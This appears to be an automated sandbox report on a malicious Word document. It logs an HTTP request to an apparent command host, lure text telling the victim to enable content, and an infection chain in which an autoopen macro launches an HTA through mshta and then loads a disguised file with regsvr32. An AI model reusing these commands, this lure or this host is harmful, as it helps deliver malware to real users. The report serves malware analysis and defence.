Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com;
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comL
Source: WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comc
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comcB
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comgz
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comm
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://tasks.office.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.comt
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://web.microsoftstream.com/video/I9g
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://webshell.suite.office.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosp
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://wus2.contentsync.
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://wus2.pagecontentsync.
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://www.odwebp.svc.ms
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msom
Source: unknownDNS traffic detected: queries for: winrentals2017b.com
Source: global trafficHTTP traffic detected: GET /tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: winrentals2017b.comConnection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" button on the top bar, and then click 'Enable content" Page1 of 1 116words 112 O
Source: Screenshot number: 4Screenshot OCR: Enable content" Page1 of 1 116words 112 O Type here to search Ki E a a g wg m % - I + lOW, 'f
Source: Screenshot number: 8Screenshot OCR: Enable editing" button on the top bar, and then click 'Enable content" Page1 of 1 116words It? O
Source: Screenshot number: 8Screenshot OCR: Enable content" Page1 of 1 116words It? O Type here to search Ki E a a g wg m % - I + 100% 'f
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function s, API IWshShell3.exec("explorer youTube.hta")
Source: charge_12.01.2021.docOLE indicator application name: unknown
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.drOLE indicator application name: unknown
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXECode function: 1_2_10863732
Source: charge_12.01.2021.docOLE, VBA macro line: Public Sub autoopen()
Source: VBA code instrumentationOLE, VBA macro: Module main, Function autoopen
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: charge_12.01.2021.docOLE indicator has summary info: false
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.drOLE indicator has summary info: false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: charge_12.01.2021.docOLE indicator, VBA macros: true
Source: charge_12.01.2021.docOLE, VBA macro line: keywords = activedocument.builtindocumentproperties("keywords").value
Source: charge_12.01.2021.docReversingLabs: Detection: 29%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\explorer.exe explorer youTube.hta
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\explorer.exe explorer youTube.hta
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg
Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{55D9ACF0-6563-4AA9-BDA1-49018F8DF26E} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal100.expl.evad.winDOC@8/16@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: charge_12.01.2021.docOLE document summary: title field not present or empty
Source: charge_12.01.2021.docOLE document summary: edited time not present or 0
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.drOLE document summary: title field not present or empty
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.drOLE document summary: author field not present or empty
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.drOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: charge_12.01.2021.docInitial sample: OLE summary keywords = ath.ebuTuoy
Source: ~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp.1.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Source: C:\Windows\SysWOW64\mshta.exeCode function: 7_2_0AA5C334 push eax; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 7_2_0AA5F114 push ebp; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 7_2_0AA5C364 pushfd ; ret
Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: explorer.exe, 00000006.00000002.563322432.00000000007E5000.00000004.00000020.sdmpBinary or memory string: War&Prod_VMware_
